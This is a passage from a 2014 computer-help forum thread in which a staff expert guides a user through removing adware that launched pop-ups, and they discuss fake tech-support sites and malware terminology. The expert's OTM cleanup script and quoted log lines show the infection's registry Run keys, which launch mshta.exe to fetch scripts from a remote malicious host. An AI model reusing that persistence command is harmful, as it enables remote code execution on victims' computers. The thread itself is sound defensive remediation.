Pop up ad on desktop will not go away...

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by yamatosoul, Apr 23, 2014.

  1. yamatosoul

    yamatosoul Private E-2

    I made the mistake of clicking on a link in a spam mail that showed up in my inbox, and now, I have a pop up ad for a porn sight or something that will not go away. I went through all the steps in the READ ME FIRST section, and although it caught many infections, the ad still remains. It seems to have weakened it quite a bit, but it is not going away. I have attached logs for all the programs that had some results. I would greatly appreciate your expertise in getting rid of this infection. Thank you so much in advance.

    Max
     

    Attached Files:

  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Make sure that you shutdown both Advanced SystemCare ( and other Iobit protection ) and also Norton 360 before doing the below to avoid problems.

    Please download OTM by Old Timer and save it to your Desktop.
    • Run OTM.exe by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).
    • Copy the lines from the below codebox to the clipboard by highlighting ALL of them and pressing CTRL + C
      (or, after highlighting, right-click and choose Copy): Do not include the word Code: which is just a title line of
      the code box
    Code:
    :Processes
    explorer.exe
    :Files
    C:\Program Files (x86)\Conduit
    C:\ProgramData\blekko toolbars
    C:\Users\Isao\AppData\Local\Conduit
    C:\Users\Isao\AppData\Local\Google\Chrome\User Data\Default\Web Data
    C:\Users\Isao\AppData\LocalLow\Conduit
    C:\Users\Isao\AppData\Local\Temp\*.*
    :Reg
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    "RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    [HKEY_USERS\S-1-5-21-2997685425-679866637-1779945573-1000\Software\Microsoft\Windows\CurrentVersion\run]
    "SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    "RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    [HKEY_USERS\S-1-5-21-2997685425-679866637-1779945573-1000\Software\Microsoft\Windows\CurrentVersion\runonce]
    "RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16"=-
    :Commands
    [purity]
    [EmptyTemp]
    [start explorer]
    [Reboot]
    • Return to OTM, right click in the Paste List of Files/Folders to Move window (under the yellow bar
      ) and choose Paste.
    • Now click the large [​IMG] button.
    • If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
    • Close OTM.
    Now navigate to the C:\_OTM\MovedFiles folder ( assuming your Windows drive is C). This is where your log will be
    saved in the form of Date and Time mmddyyyy_hhmmss.log. Just look for the most recent .log file. Attach
    this log file to your next message.

    Now please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
    • The tool will open and start scanning your system.
    • Note: That JRT may reset your home page to a google default so you will need to restore your home page setting if this happens.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Attach JRT.txt to your next message.
    Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).

    Then attach the below logs:
    • the C:\_OTM\MovedFiles log
    • the JRT.TXT log
    • C:\MGlogs.zip
    Make sure you tell me how things are working now!
     
  3. yamatosoul

    yamatosoul Private E-2

    Thank you very much for your response. However, I was running out of time, and needed my PC desperately, so, I had to seek out professional help in order to get this fixed. BUT (and this is a big BUT) my nightmare began after I sought out professional help, and I would like to share my experiences on this forum in case anyone else experiences something similar in the future.

    First, in my haste, I found what I thought was an official Norton tech site (of course, it was not), and contacted the 800 number:
    http://antivirus-technicalsupport.com/Norton.html

    The tech there was extremely professional and polite, and the charge for the one time cleaning was $80. However, his skills were a different story. To make a long story short, he spent 6 hours and when he could not eliminate the pop up, he tried to hide it from me. In the end, I called my bank and had the charge removed.

    Next, I found the real Norton tech site, and purchased their one time cleaning service for $99. To summarize, it took 3 regular Norton techs and 1 senior Norton tech a total of 11 hours to eliminate my virus. It was that bad and that new, according to them. Of course, I am no expert, but I was watching them work for most of those 11 hours, so, I do know 2 things for sure:

    1. It was a virus that was rooted in or deeply related to mshta.exe (the first tech stopped once and went home to do research on this overnight)
    2. There was also a direct connection to IE11. The fake tech that I intially contracted, somehow, figured out that downgrading to IE10 hid the pop up ad. I confirmed this because when I asked why he downgraded to IE10, he tried to tell me that my PC does not work with IE11. And when I reinstalled IE11, the pop up came right back.

    I really hope the virus info above means something to the geniuses on this site. The Norton guys seemed extremely professional and intelligent, but even they were telling me that they've never encountered anything like this. This was the first time I've ever had to go outside for help because the READ ME FIRST section on this site has always been phenomenal. But I know now that there are some mean mother f@ck'n viruses out there, and I hope no one else has to through what I just went through these past several days...
     
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    No it wasn't that bad, and I don't believe that it was a virus. More likely just junkware addons. If you had just stayed here and completed our instructions you would have been all fixed up for free.;) The instructions I gave you below would have removed the issue with mshta.exe. See my fix below which was removing the below registry entries


    O4 - HKCU\..\Run: [SystemBootp7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/reg2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16&log=1
    O4 - HKCU\..\Run: [RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/set_inf2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16
    O4 - HKCU\..\RunOnce: [RegWritep7nJNmCW6C4skDw0b9oFNTANETNqgn16] mshta.exe http://dgr.ombnsuwb.net/set_inf2.php?cccid=p7nJNmCW6C4skDw0b9oFNTANETNqgn16

    The fix was actually quite simple.
     
  5. yamatosoul

    yamatosoul Private E-2

    Of course, I have very limited knowledge, but I'm not sure how you could say it wasn't a virus when I myself intially caught a bunch of Trojans by going through the steps in READ ME FIRST. Then, I watched the Norton techs catch tons more Trojans afterwards. I certainly don't mean any disrespect here because I appreciate your help, but doesn't finding Trojan after Trojan over a period of 11 hours mean that my PC was infected with a virus? But I do think the 3 techs that worked on my PC were a mixed bag in terms of skill and knowledge. Also, they all had a sort of air of arrogance about them like "We're Norton and there's no virus that we can't clean". But they were clearly unprepared, and it showed.

    This time, I just didn't have time, but I'd like to ask for future reference; if the virus is something brand new and something that even you have never encountered, do you have procedures to clean in such a situation? Again, I really appreciate your input.
     
  6. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Because it is not a virus. A virus is not a trojan. There are many forms of malware. Example: virus, trojan, rootkit, information stealers ( not necessarily a trojan ), hijackers, adware, junkware, ....etc. But a virus is something that has a vrius signature and spreads thru other files. This is not what you had. You simply had several registry keys hooked into your startup process that were hooking into mshta..exe and there were name a trojan by Malwarebytes. Again that does not mean it is a virus. It is just a matter of correct terminology. Man people come here with basic adaware and/or junkware and refer to them a virus which is very incorrect. The term malware was coined ( and I may have been one of the first to use ) to cover all the possible different forms of Malicious software. Antivirus programs had to change from just antivirus to actually cover antispyware, trojans, rootkits.etc. They still don't do too much about the adware/junkware that is around which is why many other tools had to be developed. If commercial protection software did a better job at protecting against malware and actually removing it, forums like ours would not exist. :)

    No because they are not the same thing. I would have to see a log of what was being detected but I bet it is just the same thing I was giving you instructions to remove. Norton was probably detecting the same thing over and over. Some of them may have been getting detected in System Restore points which is not really a new detection. It is just being save from the current infection each time a restore point was made.

    Running the READ & RUN ME FIRST is always the first step. If it does not fix th problem then the manual instructions will create based on your logs will. ;)
     
  7. yamatosoul

    yamatosoul Private E-2

    Thanks. I appreciate that. I think I kind of panicked this time because the READ ME FIRST section here has always been more than sufficient for me, and when it didn't fix the problem, I thought the problem was a lot worse than it actually was (like you said). And the misinformation out there regarding the terminology is something that I've always wondered about as well.

    One more question: I currently own just one PC, so, I cannot be without it for too long. Are there malware/virus situations where I should not be using it all while I wait for a response on this on this forum? This was the main reason why I decided to contact Norton; I was afraid that using my PC while infected may cause further damage (further spread, steal personal info, etc).
     
  8. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome.
    Take a look at the beging of the READ & RUN ME and see Notice # 2 which stated
    Potentially yes but we would not know for sure until we looked at your logs. However in general if your antivirus or any other antimalware program warns you of a trojans, rootkits, or anything fitting the description of an information stealer then you should limit your use greatly until fix and for sure do not log into any financial related links either until fixed.
     
  9. yamatosoul

    yamatosoul Private E-2

    Gotcha. As always, I learned a lot on this forum (this time, even more than usual). At least next time, I'll know that there isn't any better option than Major Geeks forum:major

    Thank you very much, chaslang!
     
  10. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome . Surf safely!
     

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds